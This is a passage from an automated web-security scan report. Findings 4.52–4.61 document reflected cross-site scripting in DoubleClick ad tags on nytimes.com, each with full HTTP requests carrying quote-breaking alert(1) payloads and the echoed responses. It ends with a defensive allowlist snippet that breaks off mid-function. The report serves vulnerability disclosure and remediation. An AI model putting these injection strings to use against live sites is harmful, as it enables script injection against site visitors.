4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The scanner attributes this issue to the sz request parameter, apparently because it parses the semicolon-delimited path parameters (sz, pc, ord, click) as one value running up to the first &. As the request shows, the payload a9ad8'-alert(1)-'abd4b72ba03 was actually appended to the type=goto value inside the click= URL, and that URL was copied unmodified into a JavaScript string encapsulated in single quotation marks. The reflection point is therefore the same click= string as in 4.50 and 4.51, reached through a different parameter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

As in 4.52, the sz label reflects the scanner's parsing of the semicolon-delimited path rather than the actual injection point: the payload 1c8cb"-alert(1)-"c06727afda5 was appended to the type=goto value inside the click= URL, which was copied unmodified into a JavaScript string encapsulated in double quotation marks.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a918'-alert(1)-'8a98d61d702 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3335a"-alert(1)-"d20d01cfbe4 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 421d5"-alert(1)-"075af53bbdf was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74793'-alert(1)-'ea56e5f634 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3039'-alert(1)-'e3d745f63fd was submitted in the goto parameter. This input was echoed unmodified in the application's response, where the ad server appends its own landing URL directly after the supplied value (the response shows goto=<payload> immediately followed by the newsroom.intel.com URL), so the payload sits in the middle of the literal rather than at its end.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fdhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0dd0"-alert(1)-"368571c22a3 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89feb'-alert(1)-'01cc9048b49 was submitted as the name of a parameter added to the end of the click= URL (as &89feb'-alert(1)-'01cc9048b49=1) and was echoed unmodified in the application's response. The whole query string of the click= URL is reflected, so the injection surface is not limited to the named parameters in 4.50 to 4.59: any parameter name or value an attacker adds to that URL reaches the script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d43"-alert(1)-"5168faf1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
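Findings 4.54 to 4.61 show that every query parameter of the click= URL is reflected, including names the client invents. An alternative to encoding the value at output time is to stop unexpected input at the boundary: rebuild the click URL from an allowlist of the parameters the tag actually carries, each with a strict grammar, and reject the request otherwise. The following added example (JavaScript; not DoubleClick's or nytimes.com's code) does that with the parameter names taken from the requests in 4.54 to 4.61; the value grammars, the fixed click base and the decision to reject rather than silently drop an unknown parameter are assumptions.

```javascript
// Added example for this report; not DoubleClick's or nytimes.com's code.
// Findings 4.54-4.61 show the whole query string of the click= URL reflected,
// including parameter names the client invents. Rebuild the click URL from an
// allowlist instead of reflecting whatever arrived.

const CLICK_BASE = "http://www.nytimes.com/adx/bin/adx_click.html";

// Value grammars are assumptions inferred from the captured requests: hosts,
// paths, campaign ids and hashes draw on a small alphabet; snx is numeric; goto
// is sent empty (the ad server appends its own landing URL, see 4.58/4.59).
const TOKEN = /^[A-Za-z0-9._\-\/]*$/;
const ALLOWED = new Map([
  ["type", /^goto$/],
  ["page", TOKEN], ["pos", TOKEN], ["camp", TOKEN], ["ad", TOKEN],
  ["sn2", TOKEN], ["snr", TOKEN], ["sn1", TOKEN],
  ["snx", /^[0-9]*$/],
  ["goto", /^$/],
]);
const FLAGS = new Set(["opzn"]);   // bare name with no value, as in the requests

// Return a canonical click URL, or null to reject the request, when the URL has
// the wrong base, an unknown or repeated parameter, a flag carrying a value, or a
// value that fails its grammar. Values are decoded before validation so that a
// percent-encoded quote cannot slip past the check, then re-encoded on output.
function rebuildClickUrl(url) {
  const q = url.indexOf("?");
  if (q === -1 || url.slice(0, q) !== CLICK_BASE) return null;
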